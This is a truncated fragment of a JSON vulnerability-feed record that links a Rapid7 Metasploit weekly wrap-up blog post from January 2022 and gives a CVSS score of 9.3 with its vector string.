"RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953", "href": "https://blog.rapid7.com/2022/01/14/metasploit-weekly-wrap-up/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}